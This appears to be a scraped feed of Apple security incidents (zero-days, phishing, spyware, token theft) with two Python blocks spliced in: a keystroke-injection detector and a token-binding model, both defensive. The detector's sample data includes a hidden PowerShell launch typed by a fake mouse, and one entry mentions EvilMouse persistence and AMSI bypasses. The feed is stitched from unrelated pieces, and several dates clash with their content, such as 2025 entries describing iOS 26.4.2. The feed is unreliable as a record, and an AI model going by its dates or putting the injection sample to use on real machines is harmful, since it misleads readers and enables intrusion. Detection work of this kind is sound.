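# Constructed stream: a person typing at ~140 ms per key, then the "mouse" is plugged in,
# moves, clicks, and types a PowerShell launch at 4 ms per key.
SAMPLE_EVENTS = (
    typed_events("usb-1234:5678", 100, "hello team", 140)
    + [HidEvent(4000, "usb-abcd:0001", "move"), HidEvent(4010, "usb-abcd:0001", "click")]
    + typed_events("usb-abcd:0001", 5000, "powershell -WindowStyle Hidden", 4)
)

if __name__ == "__main__":
    for dev, why in analyze(SAMPLE_EVENTS):
        print(f"{dev}: {why}")
    print("injected text:", reconstruct_text(SAMPLE_EVENTS, "usb-abcd:0001"))
```

The class mismatch check is the stronger of the two, since a firmware author can slow the injection down to human speed but cannot make keyboard reports arrive from a mouse without declaring a keyboard interface in the descriptor; a device that does declare both is exactly the composite HID a whitelisting policy should prompt on before accepting.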
The project’s GitHub repository (NEWO-J/evilmouse) includes extensible code for DuckyScript compatibility, Rust-based keystroke acceleration, and persistence techniques. Future enhancements may include remote activation via magic packets and AMSI bypasses.
EvilMouse underscores the growing threat of hardware-based attacks disguised as innocuous peripherals, forcing organizations to rethink peripheral supply chain security.
FEBRUARY 2026 · score 710
Vulnerability · 11 Feb 2026 · Apple · CRITICAL-2 · score 708 · ID APP1770865044
Apple: Apple 0-Day Vulnerability Actively Exploited in Sophisticated Attack to Target Individuals
Apple Patches Critical Zero-Day in iOS 26.3 Exploited in Targeted Spyware Attacks
On February 11, 2026, Apple released iOS 26.3 and iPadOS 26.3, addressing over 40 vulnerabilities, including a critical zero-day flaw (CVE-2026-20700) in the dyld component actively exploited in targeted attacks. Discovered by Google’s Threat Analysis Group, the memory-corruption vulnerability allows arbitrary code execution for attackers with memory-write access.
The flaw affects Apple’s Dynamic Link Editor (dyld), which manages dynamic library loading across iOS, macOS, and other platforms. Due to improper state management, attackers could corrupt memory during library loading, hijacking control flow to execute malicious code. Apple confirmed the exploit was used in "extremely sophisticated attacks" against high-profile individuals, such as journalists and activists, aligning with nation-state spyware campaigns like Pegasus.
The attack chain likely begins with initial access via phishing or zero-click exploits, followed by privilege escalation through dyld. While no public proof-of-concept exists, Apple’s rapid patching highlights the threat’s severity. The fix, described as "improved state management," enhances validation in dyld’s memory allocation and linking processes.
Affected devices include iPhone 11 and later, recent iPad Pro, Air, and mini models. The update also patches 37+ additional vulnerabilities, including:
- Kernel flaws (CVE-2026-20617/20615) enabling root escalation.
- WebKit bugs leading to denial-of-service or crashes.
- Lock screen bypasses in Accessibility and Photos (CVE-2026-20642).
- Sandbox escape vulnerabilities for app breakouts.
This marks Apple’s first zero-day patch of 2026, following seven in 2025, signaling persistent advanced threats. While the attacks remain highly targeted, public disclosure raises risks of broader exploitation. Apple’s update reinforces defenses, but enterprises are advised to enforce MDM policies and monitor for anomalies.
FEBRUARY 2026 · score 714
Cyber Attack · 09 Feb 2026 · Apple · CRITICAL-4 · score 710 · ID APP1770616335
Apple: Beware of Apple Pay Phishing Attack that Aims to Steal Your Payment Details
Sophisticated Vishing Campaign Targets Apple Pay Users in Phishing Scam
A highly convincing phishing campaign is actively targeting Apple Pay users, employing deceptive emails and phone-based social engineering to steal financial and login credentials. The attack, analyzed by Malwarebytes, begins with a fraudulent email mimicking an official Apple receipt, complete with the company’s logo, a fabricated case ID, and a timestamp. The message warns of a blocked high-value purchase, such as a 2025 MacBook Air, and urges the recipient to call a provided support number if the alleged "appointment" to review the fraud is inconvenient.
Unlike traditional phishing schemes that rely on malicious links, this campaign uses vishing (voice phishing) to manipulate victims over the phone. When contacted, scammers posing as Apple’s fraud department follow a scripted conversation, initially verifying harmless details like partial phone numbers before escalating to requests for Apple ID two-factor authentication (2FA) codes. In real time, attackers use these codes to hijack accounts, gaining access to stored data, photos, and linked payment methods.
The scam’s effectiveness lies in its psychological tactics: it leverages urgency, brand trust, and fabricated transaction details to bypass skepticism. Researchers emphasize that Apple never schedules fraud reviews via email or demands callbacks, and official communications always originate from verified Apple domains. Victims who fall for the scheme risk full account compromise, with attackers potentially draining linked credit cards or locking users out of their devices.
The campaign underscores the growing sophistication of social engineering attacks, where human manipulation, not technical exploits, remains the primary vector for financial theft.
FEBRUARY 2026 · score 727
Breach · 01 Feb 2026 · Apple · CRITICAL-13 · score 714 · ID VERRUSAPP1773766909
Verizon, Russell Cellular and Apple: Family's Verizon account hacked, suspect purchased iPhones, Apple Watches
Verizon Customers Targeted in Sophisticated Fraud Scheme Involving Fake IDs and Stolen PINs
A Massachusetts family fell victim to a coordinated fraud scheme after hackers gained access to their Verizon account, using stolen credentials to purchase thousands of dollars in Apple devices at two retail locations. Laura and Eric Roppolo, residents of Holland, Massachusetts, first noticed irregularities when they received an early payment receipt referencing an unfamiliar card number. Days later, they discovered unauthorized purchases of iPhones and Apple Watches at Russell Cellular stores (an authorized Verizon retailer) in Danvers and Malden, towns they had never visited.
The breach disrupted the family’s finances for over a week, freezing their bank accounts and halting direct deposits. Verizon confirmed that its two-step verification process, which requires a government-issued ID and a PIN, was followed at both stores, suggesting the suspect presented a fake ID and had somehow obtained the Roppolos’ PIN. How the PIN was compromised remains unclear, though authorities suspect phishing, mail theft, or eavesdropping on phone conversations as potential vectors.
Malden Police identified a suspect captured on security footage at both stores during the fraudulent transactions. Investigators are working to confirm the individual’s identity, while the Roppolos have raised concerns about broader security vulnerabilities that could enable similar attacks. The case highlights the growing sophistication of fraud schemes targeting telecom accounts, where stolen personal data is leveraged to bypass verification protocols.
JANUARY 2026 · score 744
Breach · 23 Jan 2026 · Apple · CRITICAL-18 · score 726 · ID NETFACTIKBINONLMICAPPCONGOV1769182444
Netflix, Facebook, TikTok, Binance, OnlyFans, Microsoft Outlook, Apple iCloud, Consumer Banks and Government Systems: 149 million login details leaked via unsecured database
Massive Exposed Database Containing 149 Million Credentials Discovered Online
Security researcher Jeremiah Fowler uncovered a publicly accessible database containing 149 million usernames and passwords, including credentials for major platforms and sensitive systems. The unsecured collection, which was freely accessible via a web browser, included 48 million Gmail accounts, 17 million Facebook logins, 420,000 Binance credentials, 3.4 million Netflix accounts, 780,000 TikTok logins, and 100,000 OnlyFans accounts. Additionally, it held 1.5 million Microsoft Outlook, 900,000 Apple iCloud, and 1.4 million .edu credentials, along with login details for government systems and consumer bank accounts.
Fowler reported the database to the Canadian hosting provider, which took it offline after nearly a month for violating its terms of service. During this period, the database continued to grow, suggesting ongoing data collection. Fowler suspects the credentials were harvested by infostealer malware, which captures usernames and passwords (by logging keystrokes or reading saved browser logins) as victims sign in from infected machines.
The discovery highlights the thriving infostealer market, where stolen credentials are sold for as little as $10 per log on the dark web. The simplicity of such malware makes it a popular tool for cybercriminals, enabling large-scale credential theft with minimal effort. The incident underscores the risks of unsecured databases and the widespread impact of infostealer-driven breaches.
DECEMBER 2025 · score 745
Cyber Attack · 15 Dec 2025 · Apple · CRITICAL-4 · score 741 · ID PEGFOXWISAPP1767108955
Pegatron, Foxconn, Wistron and Apple: Cyberattack against an Apple partner: delays ahead?
Cyberattack on Apple's Chinese Subcontractor
Cyberattack Targets Apple Supplier in China, Raising Production Concerns
In mid-December, a sophisticated cyberattack struck an undisclosed Apple subcontractor operating in China, potentially disrupting production and exposing sensitive data. While details remain scarce, the incident mirrors past disruptions—such as the 2018 malware attack on TSMC, which halted chip production for Apple—suggesting possible delays in device manufacturing.
The motives behind the attack are unclear. Hackers may have sought proprietary information on Apple products or manufacturing processes, or deployed ransomware to extort the supplier, with Apple potentially pressured to intervene to avoid production slowdowns. The compromised data could range from iPhone specifications to internal operational procedures.
Apple relies on a vast network of suppliers, including major players like Foxconn, Pegatron, and Wistron, but the identity of the targeted company has not been disclosed. The incident underscores the vulnerabilities in global supply chains, where even a single breach can ripple through production pipelines, impacting product availability. Further updates on the attack’s scope and impact are pending.
DECEMBER 2025
746
Vulnerability
12 Dec 2025 • Apple
Apple: Why iPhone users should update and restart their devices now
Apple WebKit Zero-Day Vulnerabilities Exploited in Targeted Spyware Attacks
745
CRITICAL-1
APP1768336376
Apple Patches Two Zero-Day WebKit Vulnerabilities in iOS 26, Urging Immediate Updates
On December 12, 2025, Apple released critical security patches for two actively exploited WebKit zero-day vulnerabilities affecting iPhone 11 and newer devices. The flaws, linked to mercenary spyware, allowed attackers to execute arbitrary code via malicious web content, posing risks even to users who avoid high-risk behavior.
WebKit, the engine behind Safari and many iOS apps, represents a broad attack surface. Apple confirmed the vulnerabilities were already being exploited in the wild, primarily in highly targeted campaigns against diplomats, journalists, and executives. However, such exploits often spread beyond initial targets as tooling leaks or gets repurposed.
The fixes are only available in iOS 26+, which includes new memory protections such as Memory Integrity Enforcement. Despite this, adoption of iOS 26 has been slow: only 4.6% of active iPhones run iOS 26.2 as of January 2026, with just 16% on any iOS 26 version. Older, unsupported devices will not receive these protections.
Upgrading to iOS 26.2 also forces a device restart, which flushes memory-resident malware; living only in memory is a common tactic advanced spyware uses to avoid leaving persistent artifacts. Apple's update process therefore ensures users both patch the vulnerabilities and clear potential infections in one step.
The vulnerabilities also heighten risks for Apple Mail users, as malicious HTML-formatted emails could trigger exploitation. While Apple’s Lockdown Mode offers additional protection for high-value targets, the primary defense remains updating to the latest iOS version.
NOVEMBER 2025
748
Cyber Attack
01 Nov 2025 • Apple
Squarespace, Medium, Apple and Craft: Fake macOS Troubleshooting Sites Used to Steal iCloud Data in ClickFix Scam
New ClickFix Social Engineering Campaign Targets macOS Users with Fake Troubleshooting Guides
743
HIGH-5
SQUNODMEDAPP1778279131
New ClickFix Social Engineering Campaign Targets macOS Users with Fake Troubleshooting Guides
Microsoft’s Defender Security Research Team has uncovered a sophisticated cyberattack campaign leveraging a social engineering tactic called ClickFix to compromise Apple computers. Active since late 2025 and continuing into early 2026, the campaign tricks users into executing malicious commands under the guise of legitimate troubleshooting solutions.
Attackers distribute fake guides on platforms like Medium, Craft, and Squarespace, offering fixes for common issues such as disk space errors or system malfunctions. Instead of providing downloads, these sites instruct users to copy and paste commands into macOS Terminal, claiming they are system utilities or quick repairs. The guides are often multilingual and appear on websites that have since been taken down or reported.
Once executed, the commands bypass macOS security features like Gatekeeper, which typically scans only app bundles and disk images, not commands typed directly into Terminal. The malware, including AMOS (Atomic macOS Stealer), Macsync, and SHub Stealer, then prompts users to enter their system password under the pretense of installing a "helper tool." If granted, attackers gain full access to sensitive files, settings, and credentials.
The malware targets a range of high-value data, including:
- iCloud and Telegram account credentials
- Private documents, notes, and photos under 2 MB
- Cryptocurrency wallet keys (Exodus, Ledger, Trezor)
- Saved browser passwords (Chrome, Firefox)
- Authentic crypto apps, which attackers replace with trojanized versions to monitor transactions and steal funds
The campaign employs fileless attack techniques, using tools like curl and osascript to run malware directly in memory, evading traditional antivirus detection. Microsoft also identified a kill switch in the malware that halts execution if a Russian keyboard layout is detected.
In response, Apple has introduced a security feature in macOS 26.4, which now displays a "Possible malware, Paste blocked" warning when users attempt to paste suspicious commands into Terminal. The update aims to mitigate the risk of unintentional execution of malicious scripts.
Vulnerability
01 Nov 2025 • Apple
Apple: Cyber Security News ®’s Post
DarkSword: Advanced iOS Exploit Kit Targets iPhones in Four Countries
743
CRITICAL-5
APP1773858257
DarkSword: Advanced iOS Exploit Kit Targets iPhones in Four Countries
Since November 2025, a sophisticated iOS exploit kit named DarkSword has been deployed by commercial surveillance vendors and state-sponsored threat actors to extract sensitive data from iPhone users across four countries. The attack leverages six vulnerabilities, including four zero-days, to fully compromise devices running iOS 18.4 to 18.7.
The exploit chain begins with a remote code execution (RCE) vulnerability in JavaScriptCore, followed by sandbox escapes and local privilege escalation. The final payload grants attackers kernel-level access, enabling deep system control. DarkSword’s multi-stage approach highlights the growing complexity of iOS-targeted attacks, challenging the long-held assumption of iPhone security.
The campaign underscores the evolving tactics of advanced threat actors, who continue to refine their methods to bypass Apple’s defenses. No further details on the affected countries or specific forensic artifacts have been disclosed.
OCTOBER 2025
762
Breach
30 Oct 2025 • Apple
Apple
Apple Trade Secret Theft Allegations Involving Jon Prosser and Michael Ramacciotti
748
CRITICAL-14
APP1602216103125
Apple filed a lawsuit alleging that former employee Ethan Lipnik shared confidential iOS 26 development features with Michael Ramacciotti, who later disclosed them to leaker Jon Prosser via a FaceTime call. Ramacciotti accessed Lipnik’s development iPhone (containing unreleased trade secrets) while Lipnik was away, though he claims no prior conspiracy or payment agreement existed. Prosser later paid Ramacciotti $650 post-call, allegedly without Ramacciotti’s expectation. The breach involved unauthorized access to proprietary software, including unreleased iOS features, which were subsequently leaked. Ramacciotti denies tracking Lipnik’s location or retaining further confidential data, but the incident exposed Apple’s trade secrets—specifically unreleased iOS functionality—to external parties, risking competitive disadvantage and reputational harm. Apple is pursuing legal action, with Prosser facing a default judgment for non-response.
SEPTEMBER 2025
762
Cyber Attack
01 Sep 2025 • Apple
PayPal and Apple: Watch out, hackers are abusing Apple account notifications to distribute malware, steal money and data
Scammers Exploit Apple’s Email Domain in Callback Phishing Attack
758
HIGH-4
APPPAY1776691669
Scammers Exploit Apple’s Email Domain in Callback Phishing Attack
Cybercriminals have weaponized Apple's email notification system to launch a callback phishing campaign, tricking victims into revealing sensitive data or granting remote access to their devices. The attack leverages emails sent from Apple's legitimate email.apple.com domain, falsely alerting recipients of an $899 iPhone purchase made via PayPal. The message includes a phone number for victims to call to "cancel" the transaction, a classic callback phishing tactic.
Once contacted, scammers manipulate victims into sharing personal information or installing remote access tools, enabling them to drain bank accounts or conduct fraudulent wire transfers.
The campaign's novelty lies in its abuse of Apple's account creation process. Scammers exploit the first and last name fields during Apple ID registration, which accept an excessive number of characters, allowing them to embed an entire phishing message. By altering the account's shipping details, they trigger a security alert email, but instead of reaching the intended recipient, it lands in the scammer's inbox. The attackers then distribute the fraudulent emails en masse using mailing lists, a technique previously seen with Google, Amazon, and Microsoft.
Apple’s systems were similarly abused in September 2023, when threat actors hijacked iCloud Calendar invites for phishing. While the method is not new, the use of a trusted domain like Apple’s amplifies the deception, making it harder for users to detect the scam.
The incident underscores the ongoing risk of phishing attacks leveraging reputable brands to bypass security filters and exploit human urgency.
AUGUST 2025
762
JULY 2025
760
Vulnerability
01 Jul 2025 • Apple
Apple and Signal: iOS Flaw Exposed ‘Deleted’ Signal Messages
Apple Patches iOS Flaw Exposing 'Deleted' Signal Messages in FBI Investigation
759
CRITICAL-1
SIGAPP1777020266
Apple Patches iOS Flaw Exposing "Deleted" Signal Messages in FBI Investigation
Apple has released emergency security updates to fix a critical privacy flaw in iOS that allowed supposedly deleted notification data, including message previews from encrypted apps like Signal, to persist on iPhones and be recovered later. The vulnerability, patched in iOS 26.4.2 and iOS 18.7.8, was exploited by U.S. investigators to extract Signal messages from a suspect's device without breaking encryption.
The issue came to light after a 404 Media report revealed that the FBI recovered Signal messages from an iPhone linked to a criminal case involving vandalism and an assault on a police officer at the ICE Prairieland Detention Facility in Alvarado, Texas, in July. Despite the Signal app being deleted from the device, investigators retrieved message previews from the iPhone’s notification database, which had retained the data due to a logging bug.
According to Apple’s security advisory, the flaw caused notifications marked for deletion to remain stored on the device, even after disappearing from the user interface. This could expose sensitive content, such as message text or login codes, from any app. The company addressed the issue with improved data redaction, ensuring deleted notifications are no longer recoverable.
Signal acknowledged the fix in a statement, confirming that no action is required from users beyond installing the iOS update. Once applied, the patch deletes inadvertently preserved notifications and prevents future retention of such data. The company praised Apple’s swift response, emphasizing the importance of ecosystem-wide efforts to protect private communications.
The incident underscores the risks of system-level data retention, even in encrypted messaging apps. While Signal’s end-to-end encryption remained intact, the flaw created a secondary record of conversations that persisted after deletion. Users are advised to update their devices to the latest iOS versions to mitigate the vulnerability.
JUNE 2025
760
Vulnerability
16 Jun 2025 • Apple
Apple
Apple Zero-Day Vulnerability (CVE-2025-43300) in Image I/O Framework
759
CRITICAL-1
APP456082225
Apple disclosed a critical zero-day vulnerability (CVE-2025-43300) in its Image I/O framework, affecting iPhones, iPads, and Macs. The flaw, an out-of-bounds write, allows attackers to corrupt memory by exploiting maliciously crafted images, potentially executing arbitrary code with elevated privileges. While initially exploited in highly targeted attacks against high-value individuals, the risk escalates as threat actors typically repurpose such vulnerabilities for mass exploitation once patched. The flaw poses a severe risk of unauthorized system access, data theft, or device compromise if left unpatched. Apple released emergency updates (iOS 18.6.2, iPadOS 18.6.2, macOS patches) to mitigate the issue, urging all users to install them immediately. The vulnerability’s nature—enabling memory manipulation and code execution—makes it a prime tool for cybercriminals to escalate attacks, from espionage to large-scale malware campaigns.
MAY 2025
758
Vulnerability
02 May 2025 • Apple
Apple
CVE-2025-31191 Sandbox Escape Vulnerability in Apple Operating Systems
757
CRITICAL-1
APP300050225
A critical sandbox escape vulnerability was discovered in multiple Apple operating systems, tracked as CVE-2025-31191. The flaw resides in the security-scoped bookmarks mechanism, which is intended to grant sandboxed applications persistent, user-approved access to files outside their containers. By exploiting a weak keychain protection model, a malicious process running inside any vulnerable sandboxed app can delete the legitimate signing secret for the ScopedBookmarkAgent and replace it with an attacker-controlled key. With the new key in place, the attacker can generate forged bookmarks for arbitrary files, inject them into the securebookmarks.plist, and bypass App Sandbox restrictions without additional user consent. This chain of actions enables unauthorized access to sensitive user data, including private documents and potentially system files, elevating privileges and paving the way for further exploitation. The proof-of-concept demonstrated by Microsoft showed an Office macro delivering the exploit, but any sandboxed app on macOS Ventura, Sequoia, Sonoma, iOS, iPadOS, or tvOS is at risk. Apple has released patches that improve state management to prevent key deletion and replacement, and users are urged to update immediately. Organizations leveraging Microsoft Defender for Endpoint can detect suspicious keychain manipulations related to this attack vector.
APRIL 2025
759
Vulnerability
28 Apr 2025 • Apple
Apple
iOS Vulnerability CVE-2025-24091 Leads to Endless Reboot Loop
758
LOW-1
APP720042825
A critical vulnerability in iOS (CVE-2025-24091) allowed any sandboxed application or widget extension to send low-level Darwin notifications that forced devices into a “Restore in Progress” state, triggering an endless reboot loop. The exploit—just a single line of code—bricked affected iPhones and iPads running versions prior to iOS/iPadOS 18.3, rendering them unusable without a full system restore. The persistent nature of the proof-of-concept attack, implemented in a widget that automatically relaunched on restart, meant devices would immediately reenter the reboot cycle upon each reboot, effectively denying service indefinitely. End users faced downtime, data loss risk if backups were outdated, increased support calls and repair costs, and potential reputational damage for enterprises relying on vulnerable devices. Apple released iOS 18.3 to address the issue with new entitlements on Darwin notifications and awarded a $17,500 bug bounty to the researcher.
APRIL 2025
758
Vulnerability
31 Mar 2025 • Apple
Apple
Apple macOS/iOS ASLR Bypass Vulnerability via NSKeyedArchiver Serialization
757
LOW-1
APP1632416092925
Google Project Zero researcher Jann Horn uncovered a sophisticated vulnerability in Apple’s macOS and iOS that allows attackers to bypass Address Space Layout Randomization (ASLR)—a critical memory protection mechanism—by exploiting pointer leaks in the NSKeyedArchiver serialization framework. The flaw leverages Apple’s Core Foundation framework, specifically manipulating NSDictionary hash tables and the CFNull singleton to extract memory addresses through deserialization and re-serialization of attacker-controlled data. While no real-world exploitation was confirmed, the technique could enable highly reliable ASLR bypasses, paving the way for advanced memory corruption attacks. Apple patched the issue in its March 31, 2025, security update, but the vulnerability underscores risks in pointer-based hashing and serialization security. The attack requires an app to process malicious serialized data, exposing memory layout details without traditional exploits like buffer overflows. Though theoretical, it highlights systemic weaknesses in framework-level security designs, particularly in legacy serialization mechanisms used across Apple’s ecosystem.
FEBRUARY 2025
768
Breach
01 Feb 2025 • Apple
Apple
UK Home Office Order to Compromise Apple iCloud Encryption
755
CRITICAL-13
APP000021625
Apple has received a confidential order from the UK Home Office to create access into its Advanced Data Protection for iCloud, which may force them to compromise the end-to-end encryption feature or withdraw support in the UK. Complying with this could have implications for user privacy and data security worldwide if backdoor access is granted to government agencies.
JANUARY 2025
772
Cyber Attack
01 Jan 2025 • Apple
Apple: Thieves unlock stolen iPhones using cheap tools sold on Telegram
Underground Telegram Marketplace Exploits Stolen iPhones via Phishing and Unlocking Tools
766
CRITICAL-6
APP1778848319
Underground Telegram Marketplace Exploits Stolen iPhones via Phishing and Unlocking Tools
Infoblox researchers uncovered a thriving Telegram-based black market specializing in tools and infrastructure to unlock and monetize stolen iPhones. The discovery began when a victim of phone theft received a smishing text linking to a fake Apple Find My page, designed to trick users into surrendering their passcode.
Despite Apple's Activation Lock, which renders stolen iPhones unusable without the owner's credentials, over 7.35 million iPhones are stolen annually in the U.S. alone. Thieves prioritize resale value over data extraction, turning to underground markets to bypass security measures. Researchers identified over 10,000 domains tied to phishing kits and unlocking tools, many mimicking Apple's services with near-identical interfaces.
The marketplace offers Windows-based unlocking tools, FMI OFF (Find My iPhone Off) services, and iCloud Webkit phishing kits, which automate jailbreaking, extract device details (serial numbers, activation countries, Apple IDs), and generate convincing smishing messages. Some tools include AI voice calling software and prerecorded Apple support impersonations in multiple languages to enhance social engineering attacks.
Prices for unlocking services range from $5 to $50, with most tools operating on a pay-as-you-go model. While no known exploits exist for iOS versions above 17.0, some sellers falsely advertise "zero-day" vulnerabilities. Researchers noted a 350% increase in DNS telemetry linked to smishing domains in 2025, indicating a growing threat.
The ecosystem relies on stolen device data to craft targeted phishing campaigns, often using bots to cross-reference credentials and iCloud-linked devices. Despite claims of helping with "forgotten passwords," the tools' features, such as FMI OFF, suggest their primary use is illicit unlocking. Some operators even include mechanisms to evade DNS blocking and Google Safe Browsing restrictions.
Vulnerability
01 Jan 2025 • Apple
Apple: Apple Intelligence flaw kept stolen tokens reusable on another device
Apple Intelligence Token Theft Vulnerability Exposes Privacy Risks in macOS 26.0
766
CRITICAL-6
APP1776839269
Apple Intelligence Token Theft Vulnerability Exposes Privacy Risks in macOS 26.0
Researchers from The Ohio State University have uncovered critical vulnerabilities in Apple’s Apple Intelligence, a generative AI service integrated into macOS 26.0 (Tahoe), which could allow attackers to steal and reuse authentication tokens. The flaws undermine the system’s privacy-focused design, enabling unauthorized access to AI services and potential denial-of-service (DoS) attacks.
### How the System Works (and Fails)
Apple Intelligence relies on Private Cloud Compute (PCC), a framework that processes complex AI requests in the cloud while prioritizing user anonymity. The system uses a two-tiered token system under the Privacy Pass protocol:
- A Token Granting Token (TGT), a long-lived credential issued after verifying the device as authentic Apple hardware.
- One-Time Tokens (OTTs), single-use credentials redeemed for individual AI requests.
To protect privacy, traffic routes through an Oblivious HTTP (OHTTP) relay, masking IP addresses and metadata from Apple. However, researchers found that PCC nodes do not enforce TGT validation by default, despite Apple’s documentation suggesting it was reserved for future abuse prevention.
### Key Vulnerabilities
1. Plaintext Token Storage – TGTs and OTTs are stored in the login keychain in unencrypted form, accessible to any application with standard user permissions.
2. Bearer Token Design – Tokens are not tied to specific devices, meaning they can be reused by attackers if stolen. Users have no revocation mechanism, leaving compromised tokens valid for days.
3. Weak Keychain Access Controls – Malware can extract tokens via the SecItemCopyMatching API or the `/usr/bin/security` tool, often with minimal user interaction (e.g., a single "Allow" prompt).
### The Serpent Attack
Researchers developed "Serpent", a proof-of-concept exploit demonstrating how attackers could:
- Extract tokens from a victim’s Mac by tricking users into granting keychain access.
- Exfiltrate and reuse tokens on an attacker-controlled device, impersonating the victim.
- Bypass rate limits – A banned device could regain access by importing stolen tokens.
- Launch DoS attacks – By redeeming a victim’s OTTs without sending actual requests, attackers could exhaust their daily quota, triggering a "service unavailable" error.
Because the OHTTP relay hides IP addresses, Apple cannot trace malicious activity, making detection nearly impossible. The attack could even enable automated AI service resale on non-Apple platforms like Linux.
### Apple’s Response & Partial Fixes
Apple assigned CVE-2025-43509 and issued a patch in macOS 26.2, moving tokens from the login keychain to the iCloud keychain, which requires stricter kernel-level permissions. However, researchers demonstrated that kernel extensions or memory debugging could still bypass these protections, and Apple is developing further mitigations.
The findings highlight a fundamental tension in Apple’s design: anonymity without hardware binding creates inherent security risks. While the current fix raises the bar for attackers, researchers argue that cryptographic hardware binding is necessary for a robust solution.
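To make the bearer-token weakness and the hardware-binding remedy concrete, here is an added Python model (not code from the researchers, Apple, or this page) that mints one-time tokens in both styles and replays the theft scenario; the issuer, node, device ids and symmetric per-device keys are constructed simplifications standing in for attested hardware keypairs.

```python
import hashlib
import hmac
import secrets


def _mac(key, msg):
    return hmac.new(key, msg, hashlib.sha256).hexdigest()


class Issuer:
    """Mints tokens under a MAC key and keeps the per-device key learned at attestation
    (assumption: a symmetric key stands in for a hardware-held, attested keypair)."""

    def __init__(self):
        self.mac_key = secrets.token_bytes(32)
        self.device_keys = {}

    def mint_bearer(self):
        # Bearer OTT: valid for whoever presents it, the flaw described above.
        nonce = secrets.token_hex(16)
        return {"nonce": nonce, "tag": _mac(self.mac_key, nonce.encode())}

    def mint_bound(self, device_id):
        # Bound OTT: the MAC also covers the device the token was issued to.
        nonce = secrets.token_hex(16)
        tag = _mac(self.mac_key, f"{nonce}|{device_id}".encode())
        return {"nonce": nonce, "device_id": device_id, "tag": tag}


class Device:

    def __init__(self, device_id, issuer):
        self.device_id = device_id
        self._key = secrets.token_bytes(32)  # never leaves the "enclave"
        issuer.device_keys[device_id] = self._key  # registered once, at attestation

    def prove(self, challenge, nonce):
        # Proof of possession over a fresh node challenge and the token nonce.
        return _mac(self._key, f"{challenge}|{nonce}".encode())


class Node:
    """PCC-style node: shares verification keys with the issuer (simplification) and records spent nonces."""

    def __init__(self, issuer):
        self.issuer = issuer
        self.spent = set()

    def _spend(self, nonce):
        if nonce in self.spent:
            return False
        self.spent.add(nonce)
        return True

    def redeem_bearer(self, token):
        expected = _mac(self.issuer.mac_key, token["nonce"].encode())
        if not hmac.compare_digest(expected, token["tag"]):
            return False
        return self._spend(token["nonce"])

    def redeem_bound(self, token, challenge, proof):
        expected = _mac(self.issuer.mac_key, f"{token['nonce']}|{token['device_id']}".encode())
        if not hmac.compare_digest(expected, token["tag"]):
            return False
        key = self.issuer.device_keys.get(token["device_id"], b"")  # unknown id: proof fails
        expected_proof = _mac(key, f"{challenge}|{token['nonce']}".encode())
        if not hmac.compare_digest(expected_proof, proof):
            return False
        return self._spend(token["nonce"])


def run_scenario():
    """Replays the theft-and-reuse scenario against both token designs."""
    issuer = Issuer()
    node = Node(issuer)
    victim = Device("victim-mac", issuer)
    attacker = Device("attacker-box", issuer)  # attested hardware of its own

    # Bearer OTT copied from the login keychain: thief redeems it, victim's own
    # redemption then fails (the quota-burning DoS described above).
    bearer = issuer.mint_bearer()
    attacker_bearer_ok = node.redeem_bearer(dict(bearer))
    victim_bearer_ok = node.redeem_bearer(bearer)

    # Bound OTT: the stolen copy names the victim, so the attacker cannot answer
    # the node's challenge, while the victim still can, exactly once.
    bound = issuer.mint_bound(victim.device_id)
    ch = secrets.token_hex(16)  # fresh per-redemption challenge from the node
    attacker_bound_ok = node.redeem_bound(dict(bound), ch, attacker.prove(ch, bound["nonce"]))
    ch = secrets.token_hex(16)
    proof = victim.prove(ch, bound["nonce"])
    victim_bound_ok = node.redeem_bound(bound, ch, proof)
    replay_ok = node.redeem_bound(bound, ch, proof)  # same nonce, already spent

    return {
        "bearer_reused_by_attacker": attacker_bearer_ok,
        "bearer_still_usable_by_victim": victim_bearer_ok,
        "bound_reused_by_attacker": attacker_bound_ok,
        "bound_usable_by_victim": victim_bound_ok,
        "bound_replay_accepted": replay_ok,
    }
```

Binding as modelled here hands the node a device identifier, which is exactly the tension with OHTTP anonymity the findings describe; a production design would need a privacy-preserving attestation rather than a plain device id.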
Vulnerability
01 Jan 2025 • Apple
Apple
Zero-Click Attack on European Journalists with Paragon’s Graphite Spyware
766
CRITICAL-6
APP605061325
A zero-click attack leveraging a newly disclosed Messages vulnerability (CVE-2025-43200) has infected the iPhones of two European journalists with Paragon's Graphite mercenary spyware. The attack, which occurred in January and early February 2025, exploited a logic issue triggered when processing a maliciously crafted photo or video shared via an iCloud Link. The vulnerability was fixed in iOS 18.3.1, released on February 10. Apple acknowledged that this issue may have been exploited in a sophisticated attack against specific targeted individuals. Users who have upgraded to iOS 18.3.1 and later versions are safe from this attack. High-risk users are advised to enable Lockdown Mode and reboot their devices daily to minimize the attack surface.
NOVEMBER 2024
782
Breach
01 Nov 2024 • Apple
Apple
LightSpy Spyware Targeting iPhones
769
CRITICAL-13
APP000110224
The discovery of the new LightSpy spyware version targeting iPhones marks a significant security concern for Apple. This sophisticated and destructive malware compromises iOS devices, stealing sensitive information and hindering device functionality by blocking the boot-up process. The spyware utilizes old vulnerabilities to exfiltrate private data from widely-used apps, captures audio, and has a wide range of destructive capabilities including deleting user files and wiping browser history. The potential losses for individual users are substantial, ranging from personal privacy breaches to financial and data loss, while Apple's reputation for security may also suffer as a result.
JULY 2024
790
Breach
01 Jul 2024 • Apple
Apple
Apple's Integration of 'Apple Intelligence' with OpenAI's ChatGPT Raises Security Concerns
777
CRITICAL-13
APP1010070724
Apple's move to incorporate 'Apple Intelligence' with OpenAI's ChatGPT into iOS has raised security concerns, particularly from Elon Musk who labeled it as 'creepy spyware.' Despite the claims of a privacy breach, Apple ensures high privacy standards with their Private Cloud Compute system, designed to process core tasks on-device, and mask data origins during cloud-based AI computations. This architecture aims to prevent unauthorized data access, setting a new standard in AI privacy. However, potential threats to privacy and security cannot be overlooked, as data can be susceptible to interception or misuse when cloud processing is involved.
JUNE 2023
787
Breach
01 Jun 2023 • Apple
L3Harris and Apple: iPhone Hacking Toolkit Used by Russian Spies Likely Developed by U.S. Contractor
Advanced iPhone Exploit Kit 'Coruna' Traces Back to U.S. Defense Contractor, Spreads Globally
773
CRITICAL-14
APPL3H1773147416
Advanced iPhone Exploit Kit "Coruna" Traces Back to U.S. Defense Contractor, Spreads Globally
A sophisticated iOS exploit toolkit called Coruna has become a focal point in cybersecurity circles after evidence linked its origins to L3Harris, a U.S. defense contractor, before falling into the hands of Russian intelligence and Chinese cybercriminals. The case underscores the risks of government-grade hacking tools leaking into broader cybercrime and espionage operations.
